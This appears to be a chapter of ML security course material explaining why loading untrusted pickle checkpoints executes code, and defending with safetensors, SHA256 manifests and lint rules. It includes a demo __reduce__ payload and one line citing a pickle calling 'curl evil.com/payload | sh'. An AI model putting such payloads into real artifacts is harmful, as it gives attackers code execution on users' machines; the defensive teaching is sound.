
02 - Supply chain: pickle, safetensors, MANIFEST.json

The supply chain is everything we load from disk: model weights, tokenizer, RAG indices. A pickle is a serialized program run by Python's unpickler, so torch.load(untrusted_path) with full pickle semantics executes arbitrary code by design. The alternative is safetensors (data only, no code) plus a MANIFEST.json with a SHA256 per artifact, verified by scripts/verify_artifacts.sh before any load.

What "supply chain" means for this system

Every persisted artifact loaded at runtime is part of the supply chain:

| Artifact | Path (per phases 11–32) | Risk class |
| --- | --- | --- |
| Tokenizer (BPE merges + vocab) | `artifacts/tokenizer/` | Medium (JSON; integrity-only) |
| Model weights | `artifacts/checkpoints/mini-gpt-grammar.{pt,safetensors}` | High (deserialization) |
| RAG embeddings index | `artifacts/rag/index/` | Medium (binary; integrity-only) |
| RAG knowledge-base chunks | `data/kb/grammar-rules/chunks.jsonl` | Medium (JSON; content-integrity) |
| Hypothesis fuzz corpus | `.hypothesis/` | Low (test-time only) |

Thinking in supply-chain terms answers one question: if I trust nothing about who put these files on disk, what can go wrong?

Pickle: the worst-case load

A pickle is not a data format in the usual sense; it is a serialized program. When you call pickle.load(f), the pickle VM walks a sequence of opcodes that can:

Allocate objects.
Call arbitrary callables (including os.system, subprocess.run, eval).
Import arbitrary modules.
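The opcode list becomes concrete with a minimal standard-library sketch. The Payload class and the harmless eval("6 * 7") call are illustrative stand-ins. A real attack would name os.system or subprocess.run instead, and the mechanism would be identical. pickletools.genops lists the opcodes, which turn out to be an import followed by a call rather than a description of data.

```python
import pickle
import pickletools


class Payload:
    """Hypothetical hostile object; __reduce__ tells pickle how to 'rebuild' it."""

    def __reduce__(self):
        # "To recreate me, call eval('6 * 7')." A real attack would return
        # (os.system, ("...",)) here instead.
        return (eval, ("6 * 7",))


blob = pickle.dumps(Payload(), protocol=4)

# The stream holds an import (STACK_GLOBAL of builtins.eval) and a call
# (REDUCE): instructions to execute, not a description of data.
opcodes = [op.name for op, _arg, _pos in pickletools.genops(blob)]
print(opcodes)

# Deserializing runs eval("6 * 7"); the "loaded object" is its return value.
result = pickle.loads(blob)
print(result)  # 42
```

The loading side never needs the Payload class. The byte stream names builtins.eval directly, so a hostile file does not depend on anything in your codebase.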

A pickle byte sequence that calls os.system("curl evil.com/payload | sh") during deserialization is trivial to construct. There is no flag to "load data only" — that's not what pickle does.

torch.load wraps pickle. So:

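import torch
# Hostile checkpoint downloaded from a model hub. weights_only=False restores full
# pickle semantics (torch.load's default before PyTorch 2.6):
state = torch.load("downloaded.pt", weights_only=False)  # ← arbitrary code executes here
# `model` is an nn.Module built elsewhere. A well-crafted payload still returns a
# valid state dict, so this line is reached and nothing looks wrong:
model.load_state_dict(state)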

With full pickle semantics (weights_only=False, which was torch.load's default before PyTorch 2.6), the chance of RCE on torch.load(untrusted_path) is 100% if the file is hostile. Not "it depends on the model architecture." Not "if you have weird tensors." A hostile file is, by definition, one that runs code on load; the file format permits it, and the loader honors it.
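Pickle can be narrowed by overriding Unpickler.find_class so that only allowlisted globals resolve. The Python pickle documentation calls this "Restricting Globals". As we understand it, PyTorch's weights_only=True loader is also built on an allowlisting unpickler, though its real allowlist differs. The sketch below is an illustration under those assumptions, not PyTorch's implementation. SAFE_BUILTINS, AllowlistUnpickler, restricted_loads, and Hostile are hypothetical names. The approach shrinks the attack surface, but it still runs the pickle VM. That is why weights_only=True counts as defense-in-depth rather than a substitute for safetensors.

```python
import builtins
import io
import os
import pickle

# Hypothetical allowlist, modeled on the "Restricting Globals" example in the
# Python pickle docs. Plain dicts, lists, strings, and numbers use dedicated
# opcodes and never reach find_class.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Every global the stream references is resolved here, so refusing
        # stops the lookup before REDUCE can call anything.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()


class Hostile:
    def __reduce__(self):
        return (os.system, ("echo pwned",))  # blocked before it can run


config = restricted_loads(pickle.dumps({"lr": 3e-4, "layers": [1, 2]}))
print(config)

try:
    restricted_loads(pickle.dumps(Hostile()))
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```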

What "untrusted path" means

The path is untrusted if any of the following hold:

The file was downloaded from a public hub (Hugging Face, Civitai, a random GitHub release).
The file was emailed, dropped into a shared drive, or attached to a PR.
The file is on a host another user can write to without your review.
The file was downloaded a year ago; you don't remember verifying it.

Trust is a property of provenance and integrity, not of the act of having the file on disk.

Safetensors: data only, no code

safetensors is a format designed specifically to be safe to deserialize:

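The file starts with an 8-byte little-endian length N, followed by an N-byte JSON header: tensor name → {dtype, shape, data_offsets}, plus an optional __metadata__ map of strings.
The body is raw bytes for each tensor, in the declared dtype/shape, at the declared offsets.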
The loader never instantiates Python objects beyond plain tensors.

There is no opcode, no callable, no import, no __reduce__. The loader reads bytes into a tensor. End of trust boundary.

from safetensors.torch import load_file
state = load_file("downloaded.safetensors")   # just tensors, no code path to RCE
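The layout is simple enough to reproduce with struct and json, which makes the "no code path" claim easy to check. The following is a minimal sketch that assumes float32 tensors only. write_safetensors and read_safetensors are hypothetical helpers, and the writer skips details such as header alignment padding. Use the real safetensors library for actual files.

```python
import json
import struct


def write_safetensors(tensors: dict) -> bytes:
    """Hypothetical F32-only writer: name -> (shape, flat list of floats)."""
    header, body = {}, b""
    for name, (shape, values) in tensors.items():
        raw = struct.pack(f"<{len(values)}f", *values)  # little-endian float32
        header[name] = {
            "dtype": "F32",
            "shape": shape,
            "data_offsets": [len(body), len(body) + len(raw)],  # relative to data section
        }
        body += raw
    header_bytes = json.dumps(header).encode("utf-8")
    # 8-byte little-endian header length, then the JSON header, then raw tensor bytes.
    return struct.pack("<Q", len(header_bytes)) + header_bytes + body


def read_safetensors(blob: bytes) -> dict:
    (header_len,) = struct.unpack("<Q", blob[:8])
    header = json.loads(blob[8 : 8 + header_len])  # plain JSON: no opcodes, no imports
    header.pop("__metadata__", None)  # optional string-to-string metadata
    data = blob[8 + header_len :]
    tensors = {}
    for name, info in header.items():
        if info["dtype"] != "F32":
            raise ValueError(f"{name}: this sketch only handles F32")
        start, end = info["data_offsets"]
        values = struct.unpack(f"<{(end - start) // 4}f", data[start:end])
        tensors[name] = (info["shape"], list(values))
    return tensors


blob = write_safetensors({"wte": ([2, 2], [0.5, -1.0, 2.0, 0.25])})
print(read_safetensors(blob))  # {'wte': ([2, 2], [0.5, -1.0, 2.0, 0.25])}
```

The reader's only operations are json.loads and struct.unpack. No byte in the file can make it import a module or call a function.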

A hostile .safetensors file can still lie about its contents: wrong shapes, wrong values, or NaN-poisoned weights that degrade quality. That's an integrity attack, not RCE, and it is caught downstream by:

Shape checks at load_state_dict.
MANIFEST.json SHA256 verification (below).
Behavioral tests after load (Phase 20's harness will flag a degraded model).
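A NaN-poisoned tensor passes any shape check, so a cheap extra guard is to scan values after parsing. This minimal sketch assumes the header has already been parsed into a dict and that only F32 tensors need value checks. find_integrity_problems and expected_shapes are hypothetical names. In a PyTorch pipeline, the same idea would be torch.isfinite on each loaded tensor, alongside the shape checks load_state_dict already performs.

```python
import math
import struct


def find_integrity_problems(header: dict, data: bytes, expected_shapes: dict) -> list[str]:
    """Post-parse sanity checks on a safetensors-style header plus its data section.

    header: name -> {"dtype", "shape", "data_offsets"} (already parsed JSON)
    data: the bytes that follow the header
    expected_shapes: name -> shape the model architecture requires (hypothetical input)
    """
    problems = []
    tensors = {k: v for k, v in header.items() if k != "__metadata__"}
    for name in sorted(set(expected_shapes) ^ set(tensors)):
        problems.append(f"{name}: present in only one of file/model")
    for name, info in tensors.items():
        shape = info["shape"]
        if name in expected_shapes and shape != expected_shapes[name]:
            problems.append(f"{name}: shape {shape}, expected {expected_shapes[name]}")
        if info["dtype"] != "F32":
            continue  # this sketch only value-checks float32
        start, end = info["data_offsets"]
        if end - start != math.prod(shape) * 4:
            problems.append(f"{name}: byte length does not match shape")
            continue
        values = struct.unpack(f"<{(end - start) // 4}f", data[start:end])
        bad = sum(1 for v in values if not math.isfinite(v))
        if bad:
            problems.append(f"{name}: {bad} non-finite value(s)")
    return problems


# A NaN-poisoned 2x2 tensor: structurally valid, numerically broken.
data = struct.pack("<4f", 0.1, 0.2, float("nan"), 0.4)
header = {"wte": {"dtype": "F32", "shape": [2, 2], "data_offsets": [0, 16]}}
print(find_integrity_problems(header, data, {"wte": [2, 2]}))  # ['wte: 1 non-finite value(s)']
```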

Trade: safetensors gives up the convenience of "pickle anything Python can pickle" and gains a hard guarantee against RCE-on-load.

MANIFEST.json: integrity for everything else

Even with safetensors, you still need to know: is this file the one I expect, or was it swapped?

Phase 18 emits MANIFEST.json at the end of each training run:

{
  "generated_at": "2026-05-22T14:31:08Z",
  "git_sha": "a1b2c3d…",
  "artifacts": [
    {
      "path": "artifacts/checkpoints/mini-gpt-grammar.safetensors",
      "sha256": "8f2a…cc91",
      "bytes": 4194304,
      "role": "model-weights"
    },
    {
      "path": "artifacts/tokenizer/vocab.json",
      "sha256": "1d3c…0a87",
      "bytes": 16384,
      "role": "tokenizer-vocab"
    },
    {
      "path": "data/kb/grammar-rules/chunks.jsonl",
      "sha256": "4e7b…b21f",
      "bytes": 102400,
      "role": "rag-kb"
    }
  ]
}
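A sketch of how a training run might emit this file follows. It assumes the run knows each artifact's path and role up front. build_manifest, sha256_file, and the artifacts mapping are hypothetical, and Phase 18's actual code may differ. Hashing in chunks keeps memory flat for multi-gigabyte checkpoints.

```python
import datetime
import hashlib
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream the file through SHA-256 so large checkpoints don't need to fit in RAM."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(artifacts: dict, git_sha: str, root: Path = Path(".")) -> dict:
    """artifacts: repo-relative path -> role, e.g. {"artifacts/tokenizer/vocab.json": "tokenizer-vocab"}."""
    return {
        "generated_at": datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
        "git_sha": git_sha,
        "artifacts": [
            {
                "path": rel_path,
                "sha256": sha256_file(root / rel_path),
                "bytes": (root / rel_path).stat().st_size,
                "role": role,
            }
            for rel_path, role in artifacts.items()
        ],
    }
```

The run would then write json.dumps(manifest, indent=2) to MANIFEST.json once every artifact is final. Hashing before the last write would record a stale digest.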

scripts/verify_artifacts.sh (Lab 04):

Walks artifacts[].
For each entry: computes sha256sum <path>.
Compares to the stored sha256.
Exits 0 if all match. Exits non-zero with a clear message naming the mismatched file.
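The steps above can be sketched in Python for readers who want to see the logic outside a shell script. This is not the contents of scripts/verify_artifacts.sh, and verify_manifest and main are hypothetical names. The sketch reports missing files separately from hash mismatches. main returns the exit code so that a wrapper can call sys.exit(main(sys.argv)).

```python
import hashlib
import json
import sys
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_manifest(manifest_path: Path, root: Path = Path(".")) -> list[str]:
    """Return one message per bad artifact; an empty list means everything matches."""
    manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
    problems = []
    for entry in manifest["artifacts"]:
        path = root / entry["path"]
        if not path.is_file():
            problems.append(f"MISSING  {entry['path']}")
            continue
        actual = sha256_file(path)
        if actual != entry["sha256"]:
            problems.append(f"MISMATCH {entry['path']}: expected {entry['sha256']}, got {actual}")
    return problems


def main(argv: list[str]) -> int:
    manifest_path = Path(argv[1]) if len(argv) > 1 else Path("MANIFEST.json")
    problems = verify_manifest(manifest_path)
    for line in problems:
        print(line, file=sys.stderr)
    return 1 if problems else 0  # non-zero exit fails CI or aborts the load
```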

This catches:

Bit rot on disk.
An attacker swapping chunks.jsonl for a poisoned version.
A teammate accidentally overwriting weights with an older checkpoint.

It does not catch:

An attacker who also rewrites MANIFEST.json. (Mitigation: GPG-sign MANIFEST.json, store the public key out-of-band. Phase 37's lab leaves signing as a stretch goal.)
Logic bugs in the artifacts. (Mitigation: behavioral tests, Phase 20.)

The manifest is a tripwire, not a fortress. But it's a cheap tripwire that catches the common cases (rot, accidental overwrite, naive tampering).

The threat in numbers

A quick sanity check, not a measurement:

Probability that a random hub checkpoint is hostile: low but non-zero. Documented incidents exist (PoisonGPT, a 2023 proof-of-concept of tampered weights published on Hugging Face; public pickle-scanner findings of malicious checkpoints on HF in 2023–2024).
Severity if a hostile checkpoint runs: 5/5 (full RCE on the host as the user running the load).
Detection probability without tooling: ~0% (nothing visible during load).
Detection probability with MANIFEST.json + safetensors-only policy: high for naive tampering, moderate for sophisticated tampering (the attacker must compromise both the file and the manifest, plus the signing key if the manifest is signed).

Residual risk after the policy: low for this single-user, local-only deployment. Higher for any multi-user deployment, which Phase 37 explicitly does not cover.

The enforcement: bandit + custom rule

The policy "no pickle-based loads in agent code" is enforced two ways:

bandit rule B301 — flags pickle.load and friends in src/.
Custom rule — flags torch.load( without an explicit weights_only=True argument. (Even with weights_only=True, prefer safetensors; the flag is a defense-in-depth, not the primary defense.)
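One way the custom rule could work is an AST walk over each source file. The project's actual rule may be implemented differently, for example as a grep, a semgrep pattern, or a bandit plugin. In this hypothetical sketch, find_unsafe_torch_loads flags any torch.load(...) call whose weights_only keyword is not the literal True. It deliberately treats **kwargs as unsafe. It misses aliases such as import torch as t or from torch import load, which a production rule would need to resolve.

```python
import ast


def find_unsafe_torch_loads(source: str, filename: str = "<src>") -> list[str]:
    """Flag torch.load(...) calls that lack an explicit weights_only=True."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        is_torch_load = (
            isinstance(func, ast.Attribute)
            and func.attr == "load"
            and isinstance(func.value, ast.Name)
            and func.value.id == "torch"
        )
        if not is_torch_load:
            continue
        # Only a literal weights_only=True counts; variables and **kwargs do not.
        has_weights_only_true = any(
            kw.arg == "weights_only"
            and isinstance(kw.value, ast.Constant)
            and kw.value.value is True
            for kw in node.keywords
        )
        if not has_weights_only_true:
            findings.append(f"{filename}:{node.lineno}: torch.load without weights_only=True")
    return findings


sample = '''
import torch
a = torch.load("a.pt")
b = torch.load("b.pt", weights_only=True)
c = torch.load("c.pt", weights_only=False)
'''
for finding in find_unsafe_torch_loads(sample, "sample.py"):
    print(finding)
```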

just security runs both as part of CI. A new use of pickle requires a per-line # nosec with a justification comment, code review, and an entry in security/THREATS.md.

One-paragraph recap

The model-load path is the single highest-severity supply-chain risk in any ML system: torch.load on an untrusted pickle is RCE by design. The fix is two-layered: switch to safetensors (no code path to execute) and verify everything against MANIFEST.json SHA256 hashes (catch tampering and rot). Enforcement is via bandit + a custom rule, with scripts/verify_artifacts.sh as the runtime tripwire.

Next: theory/03-threat-modeling-numbers.md — the prob × severity × (1 − detection) matrix.